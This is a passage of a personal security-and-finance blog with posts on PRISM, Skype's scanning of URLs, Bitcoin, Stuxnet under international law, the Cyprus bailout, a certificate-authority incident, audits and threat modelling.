    Patriotism and secrecy are the keys. The source of these assets is easy: retired technical experts from the military and intelligence agencies. There are huge numbers of these people exiting out of the armed forces and intel community every year, and it takes only a little manipulation to present stellar CVs at the right place and time. Remember, the big tech companies will always employ a great CV that comes highly recommended by unimpeachable sources, and leapfrogging into a stable, very well paid civilian job is worth any discomfort.

    Everyone wins. It is legal, defensible and plausibly deniable. Such people are expert at keeping secrets -- about their past and about their current work. This technique is age-old, refined and institutionalised for many a decade.

    Questions remain: what to do about it, and how much to worry about it? Once it has started, this insertion tactic is rather difficult to stop and root out. At CAcert, we cared and a programme developed over time that was strong and fair -- to all interests. Part of the issue is dealing with the secrecy of it all:

    Government officials and the document itself made clear that the NSA regarded the identities of its private partners as PRISM’s most sensitive secret, fearing that the companies would withdraw from the program if exposed. “98 percent of PRISM production is based on Yahoo, Google and Microsoft; we need to make sure we don’t harm these sources,” the briefing’s author wrote in his speaker’s notes.

    But for the big US companies, is it likely that they care? Enough? I am not seeing it, myself, but if they are interested, there are ways to deal with this. Fairly, legally and strongly.

    How much should we worry about it? That depends on (a) what is collected, (b) who sees it, and (c) who's asking the question?

    There has been “continued exponential growth in tasking to Facebook and Skype,” according to the PRISM slides. With a few clicks and an affirmation that the subject is believed to be engaged in terrorism, espionage or nuclear proliferation, an analyst obtains full access to Facebook’s “extensive search and surveillance capabilities against the variety of online social networking services.”

    According to a separate “User’s Guide for PRISM Skype Collection,” that service can be monitored for audio when one end of the call is a conventional telephone and for any combination of “audio, video, chat, and file transfers” when Skype users connect by computer alone. Google’s offerings include Gmail, voice and video chat, Google Drive files, photo libraries, and live surveillance of search terms.

    Firsthand experience with these systems, and horror at their capabilities, is what drove a career intelligence officer to provide PowerPoint slides about PRISM and supporting materials to The Washington Post in order to expose what he believes to be a gross intrusion on privacy. “They quite literally can watch your ideas form as you type,” the officer said.

    Live access to everything, it seems. So who sees it?

    My rule of thumb was that if the information stayed in the NSA, then that was fine. Myself, my customers and my partners are not into "terrorism, espionage or nuclear proliferation." So as long as there is a compact with the intel community to keep that information clean and tight, it's not so worrying to our business, our privacy, our people or our legal situation.

    But there is no such compact. Firstly, they have already engaged the FBI and the US Department of Justice as partners in this information:

    In exchange for immunity from lawsuits, companies such as Yahoo and AOL are obliged to accept a “directive” from the attorney general and the director of national intelligence to open their servers to the FBI’s Data Intercept Technology Unit, which handles liaison to U.S. companies from the NSA. In 2008, Congress gave the Justice Department authority for a secret order from the Foreign Surveillance Intelligence Court to compel a reluctant company “to comply.”

    Anyone with a beef with the Feds is at risk of what would essentially be a corrupt bypass of the legal justice system of fair discovery (see this for the start of this process).

    Secondly, their credibility is zero: The NSA has lied about their access. They have deceived most if not all employees of the companies they have breached. They've almost certainly breached the US constitution and the US law in gaining warrant-free access to citizens. Dismissively. From the Guardian:

    "Fisa was broken because it provided privacy protections to people who were not entitled to them," the presentation claimed. "It took a Fisa court order to collect on foreigners overseas who were communicating with other foreigners overseas simply because the government was collecting off a wire in the United States. There were too many email accounts to be practical to seek Fisas for all."

    The FISA court that apparently governs their access is evidently ungovernable, as even members of Congress cannot breach its secrecy.

    And that's within their own country -- the NSA feels that it is under no such restrictions or niceties outside their own country.

    A reasonable examination of the facts and the record of the NSA (1, 2, 3) would therefore conclude that they cannot be trusted to keep the information secret. American society should therefore be worried. Scared, even. The risk of corruption of the FBI is by itself enough to pull the plug on not just this programme, but the system that allowed it to arise.

    What does it mean to foreign society, companies, businesses, and people? Not a lot different as all of this was reasonable anyway. Under the history-not-rules of foreign espionage, anything goes. The only difficulty likely to be experienced is when the NSA conspires with American companies to benefit them both, or when American assets interfere with commercial businesses that they've targetted as assisting enemies.

    One thing that might now get a boost is the Internet in other countries:

    The presentation ... noted that the US has a "home-field advantage" due to housing much of the internet's architecture.

    Take note, the rest of the world!

    Posted by iang at 02:28 AM | Comments (3) | TrackBack

    May 16, 2013

    All Your Skype Are Belong To Us

    It's confirmed -- Skype is revealing traffic to Microsoft.

    A reader informed heise Security that he had observed some unusual network traffic following a Skype instant messaging conversation. The server indicated a potential replay attack. It turned out that an IP address which traced back to Microsoft had accessed the HTTPS URLs previously transmitted over Skype. Heise Security then reproduced the events by sending two test HTTPS URLs, one containing login information and one pointing to a private cloud-based file-sharing service. A few hours after their Skype messages, they observed the following in the server log:

    65.52.100.214 - - [30/Apr/2013:19:28:32 +0200]
    "HEAD /.../login.html?user=tbtest&password=geheim HTTP/1.1"

    Utrace map
    Zoom The access is coming from systems which clearly belong to Microsoft.
    Source: Utrace They too had received visits to each of the HTTPS URLs transmitted over Skype from an IP address registered to Microsoft in Redmond. URLs pointing to encrypted web pages frequently contain unique session data or other confidential information. HTTP URLs, by contrast, were not accessed. In visiting these pages, Microsoft made use of both the login information and the specially created URL for a private cloud-based file-sharing service.

    Now, the boys & girls at Heise are switched-on, unlike their counterparts on the eastern side of the pond. Notwithstanding, Adam Back of hashcash fame has confirmed the basics: URLs he sent to me over skype were picked up and probed by Microsoft.

    What's going on? Microsoft commented:

    In response to an enquiry from heise Security, Skype referred them to a passage from its data protection policy:

    "Skype may use automated scanning within Instant Messages and SMS to (a) identify suspected spam and/or (b) identify URLs that have been previously flagged as spam, fraud, or phishing links."

    A spokesman for the company confirmed that it scans messages to filter out spam and phishing websites.

    Which means Microsoft can scan ALL messages to ANYONE. Which means they are likely fed into Echelon, either already, or just as soon as someone in the NSA calls in some favours. 10 minutes later they'll be realtimed to support, and from thence to datamining because they're pissed that google's beating the hell out of Microsoft on the Nasdaq.

    Game over?

    Or exaggeration? It's just fine and dandy as all the NSA are interested in is matching the URLs to jihadist websites. I don't care so much for the towelheads. But, from the manual of citizen control comes this warning:

    First they came for the jihadists,
    and I didn't speak out because I wasn't a jihadist.

    Then they came for the cypherpunks,
    and I didn't speak out because I wasn't a cypherpunk.

    Then they came for the bloggers,
    and I didn't speak out because I wasn't a blogger.

    Then they came for me,
    and there was no one left to speak for me.


    Skype, game over.

    Posted by iang at 02:25 PM | Comments (5) | TrackBack

    April 12, 2013

    A Bitcoin for your thoughts... (may regulators live in interesting times)

    Bitcoin has surged in price in the post-Cyprus debacle. To put the finger on the issue, the Troika recommended that the bank deposit holders be hit, and thus the people should directly participate in the pain of bank reconstruction. This is the right solution and the wrong solution, as I pointed out at the time.

    Now we see why it is wrong. The faith of the people in banks is undermined, and rightly so. The "only this time" solution of haircutting the depositors is nonsense, and the people know it. (For those who don't follow this sort of arcania, the FDIC has already rolled out the plan for hitting the depositors in USA, and the other countries are following suit.)

    Then, ordinary people putting faith elsewhere is a growing momentum. With the recent surge of post-Cyprus purchases of Bitcoin, it would seem that more and more people are piling in. I counted 3 independent pings in the last 2 days: journos, geeks and my mother.

    This tells me that ordinary people are getting involved in Bitcoin. The old adage about bubbles is that you should get out when the delivery boy gives you a stock tip when riding up in the lift (elevator). And bubble is what we are seeing, as Bitcoin price is purely driven by supply and demand, and right now the surge in demand is outstripping the supply.

    But let's take a step back and ponder where we are going. The big picture. A year ago I write with Philipp Güring about the effect of Gresham's Law and criminal elements on Bitcoin, and opined that this would limit the Bitcoin unit in the long term. Gresham's Law is simply that, a law, and is mostly fixed by the mining algorithm (which will end) and the block-agreement algorithm (which continues).

    However, the criminal effect is an artifact of people and is an effect that is reversible.

    If the mass of people get into it, then this can swamp the bad elements and reverse the effect of the disease. And, this isn't abnormal, in fact it is the normal new market growth process: early adopters are replaced by the mass market. (People familiar with the VHS story will see rhymes here.) If mass adoption reduces the nasty element to the point where it is below some threshold of cancer, then the unit can and should survive.

    Right now, it feels like that - everyone is positive about Bitcoin. We can predict that the emotion will feel the reverse rapidly when the current bubble bursts and the stories of loss circulate. But maybe Bitcoin will survive that too, this is its second bubble, and may not be its last.

    Which leads us to consider the regulatory angle. I would say the regulators have a problem. A big problem! If we analogise the Bitcoin market along the lines of say MP3 music, back in 1997, we could be at the cusp of a revolution which is going to undermine the CBs in a big way. Bitcoin could survive, be mostly illegal in the eyes of the regulator, and mostly acceptable in the eyes of the people.

    It's game on. The regulators are starting it issue new regs, new guidance notes, etc. But that isn't going to do it, and may even backfire, because while the regulators are looking to attack Bitcoin at front, they are still working to undermine the credibility of banks from behind. A credible message is lacking.

    And the timing couldn't be better, as the European crisis gathers steam. Spain, which is where the Bitcoin surge started, post-Cyprus, and Italy are likely both in for another bailout. Slovenia was in the news this week. No analyst I've read believes that Europe can survive more than one big bailout, nor the USA can survive Europe.

    Which leads to that old Chinese curse -- may you regulators live in interesting times. This would be a fantastic time to be there, debating and crafting solutions and new world orders. Good luck, but a word of advice: your challenge is to find a credible message -- from the point of view of the people.

    Posted by iang at 02:47 AM | Comments (3) | TrackBack

    March 27, 2013

    NATO opines on cyber-attacks -- Stuxnet was an act of force

    We've all seen the various rumours of digital and electronic attacks carried out over the years by the USA on those countries it targets. Pipelines in Russia, fibre networks in Iraq, etc. And we've all watched the rise of cyber-sabre rattling in Washington DC, for commercial gain.

    What is curious is whether there are any limits on this behaviour. Sigint (listening) and espionage are one thing, but outright destruction takes things to a new plane.

    Which Stuxnet evidences. Reportedly, it destroyed some 20% or so of the Iranian centrifugal capacity (1, 2). And, the tracks left by Stuxnet were so broad, tantalising and insulting that the anti-virus community felt compelled to investigate and report.

    But what do other countries think of this behaviour? Is it isolated? Legal? Does the shoe fit for them as well?

    Now comes NATO to opine that the attack was “an act of force”:

    The 2009 cyberattack by the U.S. and Israel that crippled Iran’s nuclear program by sabotaging industrial equipment constituted “an act of force” and was likely illegal under international law, according to a manual commissioned by NATO’s cyber defense center in Estonia.

    “Acts that kill or injure persons or destroy or damage objects are unambiguously uses of force,” according to “The Tallinn Manual on the International Law Applicable to Cyber Warfare.”

    Michael N. Schmitt, the manual’s lead author, told The Washington Times that “according to the U.N. charter, the use of force is prohibited, except in self-defense.”

    That's fairly unequivocal. What to make of this? Well, the USA will deny all and seek to downgrade the report.

    James A. Lewis, a researcher at the Center for Strategic and International Studies, said the researchers were getting ahead of themselves and there had not been enough incidents of cyberconflict yet to develop a sound interpretation of the law in that regard.

    “A cyberattack is generally not going to be an act of force. That is why Estonia did not trigger Article 5 in 2007,” he said, referring to the coordinated DDoS attacks that took down the computer networks of banks, government agencies and media outlets in Estonia that were blamed on Russia, or hackers sympathetic to the Russian government.

    Cue in all the normal political tricks to call white black and black white. But beyond the normal political bluster and management of the media?

    Under the U.N. charter, an armed attack by one state against another triggers international hostilities, entitling the attacked state to use force in self-defense, and marks the start of a conflict to which the laws of war, such as the Geneva Conventions, apply.

    What NATO might be suggesting is that if the USA and Israel have cast the first stone, then Iran is entitled to respond. Further, although this conclusion might be more tenuous, if Iran does respond, this is less interesting to alliance partners. Iran would be within its rights:

    [The NATO Manual] makes some bold statements regarding retaliatory conduct. According to the manual's authors, it's acceptable to retaliate against cyberattacks with traditional weapons when a state can prove the attack lead to death or severe property damage. It also says that hackers who perpetrate attacks are legitimate targets for a counterstrike.

    Not only is Iran justified in targetting the hackers in Israel and USA, NATO allies might not ride to the rescue. Tough words!

    Now is probably a good time to remind ourselves what the point of all this is. We enter alliances which say:

    Article 5 of the NATO treaty requires member states to aid other members if they come under attack.

    Which leads to: Peace. The point of NATO was peace in Europe, and the point of most alliances (even the ones that trigger widespread war such as WWI) is indeed peace in our time, in our place.

    One of the key claims of alliances of peace is that we the parties shall not initiate. This is another game theory thing: we would not want to ally with some other country only to discover they had started a war, to which we are now dragged in. So we all mutually commit to not start a war.

    And therefore, Stuxnet must be troubling to the many alliance partners. They see peace now in the Middle East. And they see that the USA and Israel have initiated first strike in cyber warfare.

    This is no Pearl Harbour scenario. It's not even an anticipatory self-defence, as, bluster and goading aside, no nation that has developed nuclear weapons has ever used them because of the mechanics of MAD - mutually assured destruction. Iran is not stupid, it knows that use of the weapons would result in immediate and full retaliation. It would be the regime's last act. And, as the USA objective is regime change, this is a key factor.

    So it is entirely welcome and responsible of NATO -- in whatever guise it sees fit -- to stand up and say, NO, this is not what the alliance is about. And it can't really be any other way.

    Posted by iang at 12:33 PM | Comments (1) | TrackBack

    March 18, 2013

    Cyprus deposit holders to take a 7-10% loss -- perversely this the right Cure, and it may Kill the Patient

    News over the weekend has it that Cyprus has agreed to a bailout, but in exchange for the most terrible of conditions: Cypriot depositors are to be taxed at rates from 6.75% to 9.9% of their deposits.

    This is utter madness, and the reasons are legion. Speaks the Economist:

    EVERYONE agrees that taxpayers should be protected from the cost of bailing out failing banks. But imposing blanket losses on creditors is still taboo. Depositors have escaped the financial crisis largely unscathed for fear of sparking panic, which is why the idea of hitting uninsured depositors in Cypriot banks has caused policymakers angst.

    You muck around with deposit holders or your own people at your peril. There is now a fair chance of a bank run in Cyprus, and a non-trivial chance of riots.

    Further, the bond holders don't get hit. Not even the unprotected ones!

    Worse, yet, the status of deposit is enshrined in a century of law, decisions and custom. It is not going to be clear for years whether the law will sustain ahead of legal challenges. Consider the mess about Greek bonds in London, and that allegedly big powerful Russian oligarchs are involved? A legal challenge is a dead certainty.

    Finally, and what is the worst reason of all - the signal has been sent. What happened to the Cypriots can and will happen to the Spanish. And the Italians. And if them, the French. And finally, those safe in the north of Europe will now see that they are not safe.

    The point is not whether this will happen or not: the point is whether you as an individual saver wish to gamble your money in your bank that it won't happen?

    The direction of efforts to improve banks’ liquidity position is to encourage them to hold more deposits; the aim of bail-in legislation planned to come into force by 2018 is to make senior debt absorb losses in the event of a bank failure. The logic behind both of these reform initiatives is that bank deposits have two, contradictory properties. They are both sticky, because they are insured; and they are flighty, because they can be pulled instantly. So deposits are a good source of funding provided they never run. The Cyprus bail-out makes this confidence trick harder to pull off.

    Other than that, it is a really good deal.

    In short words, Cyprus bail out means: start a run on European banks. Only time will tell how this goes on.

    What's to take solace? Perversely, there is an element of justice in this decision. Moral hazard is the problem that has pervaded the corpus bankus for a decade now, and has laid low the financial system.

    Moral hazard has it that if you fully insure the risk, then nobody cares. And indeed, nobody in the banking world cares, it seems, since they've all acquired TBTF status. None of the people care, either, as they happily deposited at those banks, even knowing that the financial sector of Cyprus was many times larger.

    Go figure ... here comes a financial crisis, and our banks are bigger than our country? What did the Cypriot people do? Did they join the dots and wind back their risk?

    However the figures are massaged down, the nub of the problem will remain: a country with a broken banking model. Unlike Greece, brought low by its unsustainable public finances, Cyprus has succumbed to losses in its oversize banks. By mid-2011 the Cypriot banking sector was eight times as big as GDP; its three big commercial banks were five times as large.

    No. Moral hazard therefore has it the stakeholders must be punished for their errors. And the stake holders of last resort are the Cypriot people, or at least their depositors. And their pensioners, it seems:

    In practice the main answer will be to dragoon Cyprus’s pension funds and domestic banks into financing the €4.5 billion of government bonds due to be redeemed over the next three years.

    It is highly likely that Cypriot pensioners will lose the lot, as it worked for Spain.

    Which does nothing to obviate the other arguments listed above. Regardless of this sudden and surprising display of backbone by the Troika, it is still madness. While we may actually be on the cusp of cure to the disease, the patient might die anyway.

    European leaders could at long last bite the bullet and insist on a bail-in of bank creditors to cover expected losses. The snag is that any such action would set alarm-bells ringing for investors with serious money at stake in banks elsewhere in the euro area. Mario Draghi, the ECB’s president, said on March 7th that “Cyprus’s economy is a small economy but the systemic risks may not be small.”

    Watch Cyprus with interest, as if your future depends on it. It does.

    Posted by iang at 07:02 AM | Comments (1) | TrackBack

    March 02, 2013

    google leads the world in ... oddball interview questions... ?!? (part 1 in a rant on searching for your HR mission)

    Human Resources is one of those areas that seemed fatally closed to the geek world. Warning to reader: if you do not think Human Resources displays the highest volatility in ROI of any decision you can make, you're probably not going to want to read anything more of this rant. However, if you are bemused about oddball questions asked at interviews, maybe there is something here for you.

    A rant in three parts (I, II, III).

    Let's talk about google, which leads the world in infamous recruiting techniques. So much so that an entire industry of truthsayers, diviners and astrologers have sprung up around companies like it, in order to prepare willing victims with recipes of puzzlers, newts eyes and moon dances.

    Why is this? Well, one of the memes in the press is about strange interview questions, and poking sly fun at google in the process:

    • "Using only a four-minute hourglass and a seven-minute hourglass, measure exactly nine minutes--without the process taking longer than nine minutes,"
    • "A man pushed his car to a hotel and lost his fortune. What happened?"

    These oddball questions are all very cute and the sort of teasers we all love to play as children. More. But what do they have to do with google?

    To be fair to them, it looks like google don't ask these questions at all and indeed may have banned them entirely but we need a foil to this topic, so let's play along as if they do spin some curveballs for the fun of it.

    Let's answer the implied question of "what's the benefit?" by reference to other so-called oddball questions:

    • "If Germans were the tallest people in the world, how would you prove it?" -- Asked at Hewlett-Packard, Product Marketing Manager candidate
    • "Given 20 'destructible' light bulbs (which break at a certain height), and a building with 100 floors, how do you determine the height that the light bulbs break?" -- Asked at Qualcomm, Engineering candidate
    • "How do you feel about those jokers at Congress?" -- Asked at Consolidated Electrical, Management Trainee candidate

    The first one is straight marketing, understanding how to segment the buyers. The second is straight engineering, and indeed every computer scientist should know the answer: binary search. Third one? How to handle a loaded question.

    So, all these have their explanation. Oddball questions might have merit. They are searching... but more than that, they are *directly related to the job*. But what about:

    • "How would you cure world hunger?" -- Asked at Amazon.com, Software Developer candidate

    A searching question, I'll grant! But this question has flaws. Other than discovering ones knowledge of modern economics (c.f., Yunis, de Soto) or politics or entrepreneurship or farming, how does it relate to ... software? Amazon? Retail markets? It doesn't, I'll say (and I'll leave what it does relate to, and how dangerous that is, as an exercise to the reader after having read all 3 posts).

    Now back to google's alleged questions. First above (hourglasses) was a straight mathematical teaser, but maths has little to do with software. OK, so there is a relationship but these days *any discipline on the planet* is about as related as mathematics, and some are far more relevant. We'll develop this theme in the next post.

    Second question above, about pushing cars to a hotel. What's that about? Actually, the real implied question is, "did you grow up with a certain cultural reference?" Again, nothing to do with software (which I think google still does) and bugger all to do with anything else google might get access to. Also rather discriminatory, but that's life.

    In closing, I'll conclude: asking or being asked oddball questions is not a correlation with a great place to work. Indeed, chances are, it is reversely correlated, but I'll leave the proof of that for part 2.

    Posted by iang at 02:58 AM | Comments (5) | TrackBack

    February 04, 2013

    Deviant Identity - Facebook and the One True Account

    From Facebook:

    The company identifies three types of accounts that don’t represent actual users: duplicate accounts, misclassified accounts and undesirable accounts. Together, they added up to just over 7 percent of its worldwide monthly active users last year.

    Facebook disclosed the figures in its annual report filed with the U.S. Securities & Exchange Commission on Friday.

    Duplicate accounts, or those maintained by people in addition to their principal account, represent 53 million accounts, or 5 percent of the total, Facebook said.

    Misclassified accounts, including those created for non-human entities such as pets or organizations, which instead should have Facebook Pages, accounted for almost 14 million accounts, or 1.3 percent of the total.

    And undesirable accounts, such as those created by spammers, rounded out the tally with 9.5 million accounts, or 0.9 percent of users.

    Context - systems that maintain user accounts and expect each account to map universally and uniquely to one person and only only person are in for a surprise -- people don't do that. The experience from CAcert is that even with a system that is practically only there for the purpose of mapping a human, for certificates attesting to some aspect of their Identity, there are a host of reasons why some people have multiple accounts. And most of those are good reasons, including ones laid at the door of the system provider.

    There is no One True Account, just as there is no One True Name or One True Identity. Nor are there any One True Statistics, but what we have can help.

    Posted by iang at 10:38 AM | Comments (0) | TrackBack

    January 05, 2013

    Yet another CA snafu

    In the closing days of 2012, another CA was caught out making mistakes:

    2012.5 -- A CA here issued 2 intermediate roots to two separate customers 8th August 2011 Mozilla mail/Mert Özarar. The process that allowed this to happen was discovered later on, fixed, and one of the intermediates was revoked. On 6th December 2012, the remaining intermediate was placed into an MITM context and used to issue an unauthorised certificate for *.google.com DarkReading. These certificates were detected by Google Chrome's pinning feature, a recent addition. "The unauthorized Google.com certificate was generated under the *.EGO.GOV.TR certificate authority and was being used to man-in-the-middle traffic on the *.EGO.GOV.TR network" wired. Actions. Vendors revoked the intermediates microsoft, google, Mozilla. Damages. Google will revoke Extended Validation status on the CA in January's distro, and Mozilla froze a new root of the CA that was pending inclusion.

    I collect these stories for a CA risk history, which can be useful in risk analysis.

    Beyond that, what is there to say? It looks like this CA made a mistake that let some certs slip out. It caught one of them later, not the other. The owner/holder of the cert at some point tried something different, including an MITM. One can see the coverup proceeding from there...

    Mistakes happen. This so far is somewhat distinct from issuing root certs for the deliberate practice of MITMing. It is also distinct from the overall risk equation that says that because all CAs can issue certs for your browser, only one compromise is needed, and all CAs are compromised. That is, brittle.

    But what is now clear is that the trend started in 2011 is confirmed in 2012 - we have 5+ incidents in each year. For many reasons, the CA business has reached a plateau of aggressive attention. It can now consider itself under attack, after 15 or so years of peace.

    Posted by iang at 04:14 PM | Comments (3) | TrackBack

    September 28, 2012

    STOP PRESS! An Auditor has been brought to task for a failed bank!

    In what is stunning news - because we never believed it would happen - it transpires that, as reported by The Economist:

    In 2002 the Sarbanes-Oxley act limited what kind of non-audit services an American accounting firm can offer to an audit client. But contrary to what many people believe, it did not forbid all of them. In its last full proxy statement before being bought by JPMorgan, Bear Stearns reported paying Deloitte in 2006 not only $20.8m for audit, but $6.3m for other services. The perception that auditors and clients are hand-in-glove, fair or not, is a reason why shareholders of Bear Stearns sued Deloitte along with the defunct bank. (JPMorgan and Deloitte settled in June. Deloitte paid out $20m, denying any wrongdoing.)

    So, when anybody ever asks "did any auditor get taken to task over a failed bank?" the answer is YES. In the global financial crisis, Mark 1, which cost the world a trillion or two, we can now authoritively state that Deloitte paid out $20m and denied any wrongdoing.

    In related news, the same article reports:

    IT IS hardly news that the “Big Four” accounting firms get bigger nearly every year. But where they are growing says a lot about how they will look like in a decade, and the prospects worry some regulators and lawmakers. On September 19th Deloitte Touche Tohmatsu was the first to report revenues for its 2012 fiscal year, crowing of 8.6% growth, to $31.3 billion. Ernst & Young, PwC and KPMG will soon report their revenues (as private firms the Big Four choose not to report profits).

    OK, does anyone know what the margin on audit & consulting is typically thought to be?

    Posted by iang at 07:53 AM | Comments (5) | TrackBack

    April 10, 2012

    What's the takeaway on Audit?

    OK, so I edited the title, to fit in with an old Audit cycle I penned a while ago (I, II, III, IV, V, VI, VII).

    Here's the full unedited quote from Avivah Litan, who comments on the latest 1.5m credit card breach in US of A:

    What’s the takeaway on PCI? The same one that’s been around for years. Passing a PCI compliance audit does not mean your systems are secure. Focus on security and not on passing the audit.

    Just a little emphasis, so audit me! PCI is that audit imposed by the credit card industry on processors. It's widely criticised. I imagine it does the same thing as most mandated and controlled audits - sets a very low bar, one low enough to let everyone pass if they've got the money to pay to enter the race.

    For those wondering what happened to the audits of Global Payments, DigiNotar, Heartland, and hell, let's invite a few old friends to the party: MFGlobal, AIG, Lehman Brothers, Northern Rock, Greece PLC, the Japanese Nuclear Industry disaster recovery team and the Federal Reserve.... well, here's Avivah's hint:

    In the meantime, Global Payments who was PCI compliant at the time of their breach is no longer PCI compliant – and was delisted by Visa – yet they continue to process payments.

    That's a relief! So PCI comes with a handy kill-switch. If something goes wrong, we kill your audit :)

    Problem solved. I wonder what the price of the kill-switch is, without the audit?

    Posted by iang at 06:41 PM | Comments (2) | TrackBack

    March 17, 2012

    Fans of Threat Modelling reach for their guns ... but can they afford the bullets?

    Over on New School, my threat-modelling-is-for-birds rant last month went down like a lead balloon.

    Now, I'm gonna take the rap for this one. I was so happy to have finally found the nexus between threat modelling and security failure that has been bugging me for a decade, that I thought everyone else would get it in a blog post. No such luck, schmuck. Have another go!

    Closest pin to the donkey tail went to David, who said:

    Threat modeling is yet another input into an over all risk analysis.

    Right. And that's the point. Threat modelling by itself is incomplete. What's the missing bit? The business. Look at this gfx, risk'd off some site. This is the emerging 31000 risk management typology (?) in slightly cut down form.

    The business is the 'context' as shown by the red arrow. When you get into "the biz" you discover it's a place of its own, a life, a space, an entire world. More pointedly, the biz provides you with (a) the requirements and (b) a list of validated threats. E.g., history, as we already deal with them.

    The biz provides the foundation and context for all we do - we protect the business, without which we have no business meddling.

    (Modelling distraction: As with the graphic, the source of requirements is often painted at the top of the diagram, and requirements-driven architecture is typically called top-down. Alternatively and depending on your contextual model, we can draw it as a structural model: our art or science can sit on top of the business. We are not lifting ourselves up by our bootstraps; we are lifting the business to greater capabilities and margins. So it may be rational and accurate to call the business a bottom-up input.)

    Either way, business is a mess, and one we can't avoid. We have to dive in and absorb, and in our art we filter out the essence of the problem from the business into a language we call 'requirements'.

    Then, the "old model" of threat modelling is somewhere in that middle box. For sake of this post, turn the word risk into threat. Follow the blue arrow, it's somewhere in there.

    The point then of threat modelling is that it is precisely the opposite of expected: it's perfect. In more particular words, it lives without a context. Threat modelling proceeds happily without requirements that are grounded in a business problem or a customer base, without a connection to the real world.

    Threat modelling is perfect by definition, which we achieve by cutting the scope off at the knees.

    Bring in the business and we get real messy. Human, tragic. And out of the primordial swamp of our neighbors crawls the living, breathing, propogating requirements that make a real demand on us - survival, economy, sex, war, whatever it is that real people ask us for.

    Adam talks about Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege... which sounds perfect. And I'd love to play the game :)

    But real life is these things: insider trading, teenager versus teenager versus parent versus parent, revolutions of colour, DVD sharing, hiding in plain sight, movement tracking of jealous loved ones, don't ask, don't tell, whistleblowing, revenge,...

    Which philosophy of business context first and foremost also explains a lot of other things. Just by way of one example, it gives an essential clue as to why only end-to-end security is worth anything. Application security automatically has a better chance of including the business; point-to-point designs like IPSec, SSL, DNSSec, etc have no chance. They've already handwaved anything past the relevant nodes into utter obscurity.

    Posted by iang at 05:54 PM | Comments (9) | TrackBack

    February 29, 2012

    Google thought about issuing a currency

    Chris points to:

    Google once considered issuing its own currency, to be called Google Bucks, company Chairman Eric Schmidt said on stage in Barcelona at the Mobile World Congress Tuesday.

    At the end of his keynote speech, Schmidt hit on a wide array of topics in response to audience questions. "We've had various proposals to have our own currency we were going to call Google Bucks," Schmidt said.

    The idea was to implement a "peer-to-peer money" system. However, Google discovered that the concept is illegal in most areas, he said. Governments are typically wary of the potential for money laundering with such proposals. "Ultimately we decided we didn't want to get into that because of these issues," Schmidt said.

    Offered without too much analysis. This confirms what we suspected - that they looked at it and decided not to. Technically, this is a plausible and expected decision that will be echoed by many conventional companies. I would expect Apple to do this too, and Microsoft know this line very well.

    However we need to understand that this result is intentional, the powers that be want you to think this way. Banks want you to play according to their worldview, and they want you to be scared off their patch. Sometimes however they don't tell the whole truth, and as it happens, p2p is not illegal in USA or Europe - the largest markets. You are also going to find surprising friends in just about any third world country.

    Still, google did their own homework, and at least they investigated. As a complicated company with many plays, they and they alone must do their strategy. Still, as we move into GFC-2 with the probability of mass bank nationalisations in order to save the payments systems, one wonders how history will perceive their choice.

    Posted by iang at 06:56 PM | Comments (0) | TrackBack

    January 21, 2012

    the emerging market for corporate issuance of money

    As an aside to the old currency market currently collapsing, in the now universally known movie GFC-2 rolling on your screens right now, some people have commented that perhaps online currencies and LETS and so forth will fill the gap. Unlikely, they won't fill the gap, but they will surge in popularity. From a business perspective, it is then some fun to keep an eye on them. An article on Facebook credits by George Anders, which is probably the one to watch:

    Facebook’s 27-year-old founder, Mark Zuckerberg, isn’t usually mentioned in the same breath as Ben Bernanke, the 58-year-old head of the Federal Reserve. But Facebook’s early adventures in the money-creating business are going well enough that the central-bank comparison gets tempting.

    Let's be very clear here: the mainstream media and most commentators will have very little clue what this is about. So they will search for easy analogues such as a comparison with national units, leading to specious comparisons of Zuckerberg to Bernanke. Hopeless and complete utter nonsense, but it makes for easy copy and nobody will call them on it.

    Edward Castronova, a telecommunications professor at Indiana University, is fascinated by the rise of what he calls “wildcat currencies,” such as Facebook Credits. He has been studying the economics of online games and virtual worlds for the better part of a decade. Right now, he calculates, the Facebook Credits ecosystem can’t be any bigger than Barbados’s economy and might be significantly smaller. If the definition of digital goods keeps widening, though, he says, “this could be the start of something big.”

    This is a little less naive and also slightly subtle. Let me re-write it:

    If you believe that Facebook will continue to dominate and hold its market size, and if you believe that they will be able to successfully walk the minefield of self-issued currencies, then the result will be important. In approximate terms, think about PayPal-scaled importance, order of magnitude.

    Note the assumptions there. Facebook have a shot at the title, because they have massive size and uncontested control of their userbase. (Google, Apple, Microsoft could all do the same thing, and in a sense, they already are...)

    The more important assumption is how well they avoid the minefield of self-issued currencies. The problem here is that there are no books on it, no written lore, no academic seat of learning, nothing but the school of hard-knocks. To their credit, Facebook have already learnt quite a bit from the errors of their immediate predecessors. Which is no mean feat, as historically, self-issuers learn very little from their forebears, which is a good predictor of things to come.

    Of the currency issuers that spring up, 99% are destined to walk on a mine. Worse, they can see the mine in front of them, they successfully aim for it, and walk right onto it with aplomb. No help needed at all. And, with 15 years of observation, I can say that this is quite consistent.

    Why? I think it is because there is a core dichotomy at work here. In order to be a self-issuer you have to be independent enough to not need advice from anyone, which will be familiar to business observers as the entrepreneur-type. Others will call it arrogant, pig-headed, too darned confident for his own good... but I prefer to call it entrepreneurial spirit.

    *But* the issuance of money is something that is typically beyond most people's ken at an academic or knowledge level. Usage of money is something that we all know, and all learnt at age 5 or so. We can all put a predictions in at this level, and some players can make good judgements (such as Peter Vodel's Predictions for Facebook Credits in 2012).

    Issuance of money however is a completely different thing to usage. It is seriously difficult to research and learn; by way of benchmark, I wrote in 2000 you need to be quite adept at 7 different disciplines to do online money (what we then called Financial Cryptography). That number was reached after as many years of research on issuance, and nearly that number working in the field full time.

    And, I still got criticised by disciplines that I didn't include.

    Perhaps fairly...

    You can see where I'm heading. The central dichotomy of money issuance then is that the self-issuer must be both capable of ignoring advice, and putting together an overwhelming body of knowledge at the same time; which is a disastrous clash as entrepreneurs are hopeless at blindspots, unknowns, and prior art.

    There is no easy answer to this clash of intellectual challenges. Most people will for example assume that institutions are the way to handle any problem, but that answer is just another minefield:

    If Facebook at some point is willing to reduce its cut of each Credits transaction, this new form of online liquidity may catch the eye of many more merchants and customers. As Castronova observes: “there’s a dynamic here that the Federal Reserve ought to look at.”

    Now, we know that Castronovo said that for media interest only, but it is important to understand what really happens with the Central Banks. Part of the answer here is that they already do observe the emerging money market :) They just won't talk to the media or anyone else about it.

    Another part of the answer is that CBs do not know how to issue money either; another dichotomy easily explained by the fact that most CBs manage a money that was created a long time ago, and the story has changed in the telling.

